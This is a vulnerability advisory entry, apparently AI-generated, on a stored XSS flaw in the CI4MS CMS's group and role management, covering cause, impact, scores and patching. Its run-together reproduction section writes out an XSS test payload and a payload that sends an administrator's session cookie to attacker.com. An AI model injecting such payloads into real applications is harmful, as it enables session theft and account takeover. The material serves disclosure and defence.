
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-34557 is a stored DOM-based Cross-Site Scripting (XSS) vulnerability in CI4MS, a CodeIgniter 4-based CMS skeleton with RBAC authorization and theme support. The flaw exists in the group and role management functionality, where multiple input fields fail to sanitize user-controlled input before storing and rendering it in privileged administrative views. It affects all CI4MS versions up to and including 0.28.6.0, and was disclosed on March 30, 2026, with a patch released in version 0.31.0.0. The vulnerability carries a CVSS v3.1 base score of 9.1 (Critical) per the GitHub Advisory, though NVD scores it at 9.0 (Critical) (Github Advisory, Feedly).
The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically a stored XSS variant where user-supplied input in group/role management fields is persisted to the database without sanitization and later rendered using unsafe DOM sinks (e.g., .html() or innerHTML-style operations) in administrative views without output encoding. An attacker with low-privilege authenticated access can inject a malicious JavaScript payload — such as <img src=x onerror=alert(document.domain)> — into any of three distinct group-related input fields. The payload is stored server-side and executes automatically in the browser of any administrator who visits the /backend/users/groupList/ endpoint. The advisory includes a video proof-of-concept demonstrating the full exploitation chain (Github Advisory, GitHub Security Advisory).
Successful exploitation enables persistent JavaScript execution in the browsers of privileged administrators, leading to full administrator account takeover and complete application compromise. An attacker can steal session tokens, perform unauthorized administrative actions, escalate privileges, and modify system configurations — effectively gaining control over all roles and permissions within the application. The scope change (S:C) in the CVSS vector reflects that the impact extends beyond the attacker's own session to affect the broader application and its users (Github Advisory, Feedly).
A proof-of-concept exploit with detailed reproduction steps and a video demonstration is publicly available via the GitHub Security Advisory (GitHub Security Advisory). The EPSS score is approximately 0.046% (Feedly) to 0.025% (GitHub Advisory), indicating a currently low probability of widespread exploitation within 30 days. There is no evidence of active in-the-wild exploitation at this time, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. No threat actor attribution has been reported (Github Advisory, Feedly).
/backend/users/groupList/.<img src=x onerror=alert(document.domain)>. For a more impactful attack, use a payload that exfiltrates the administrator's session cookie: <img src=x onerror="fetch('https://attacker.com/steal?c='+document.cookie)">./backend/users/groupList/ containing encoded JavaScript or HTML entities./backend/users/groupList/ followed shortly by outbound connections to unknown IPs; application logs recording group/role field values containing HTML tags such as <img>, <script>, or onerror attributes.The vendor has released a patch in CI4MS version 0.31.0.0, which addresses the lack of input sanitization and output encoding in group and role management functionality. All users should upgrade to version 0.31.0.0 or later immediately. As interim mitigations, administrators should implement strict input validation and HTML output encoding for all user-controlled fields, replace unsafe DOM sinks (.html(), innerHTML) with safe alternatives, implement Content Security Policy (CSP) headers, and restrict access to role and permission management pages to only essential administrative accounts. Additionally, applying HttpOnly, SameSite, and Secure flags to session cookies will reduce the impact of any successful XSS exploitation (Github Advisory, GitHub Security Advisory).
The vulnerability received coverage from The Hacker Wire, which published an article on the stored XSS issue in CI4MS group/role management (The Hacker Wire). An independent advisory was also published by Yazoul.net (Yazoul Advisory). Social media discussion was noted on Mastodon, with security community members sharing the advisory. The vulnerability was also tracked by InfinitSec, which highlighted the potential for full account takeover (InfinitSec). Overall community sentiment reflects concern about the critical severity and the ease of exploitation given the public PoC.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."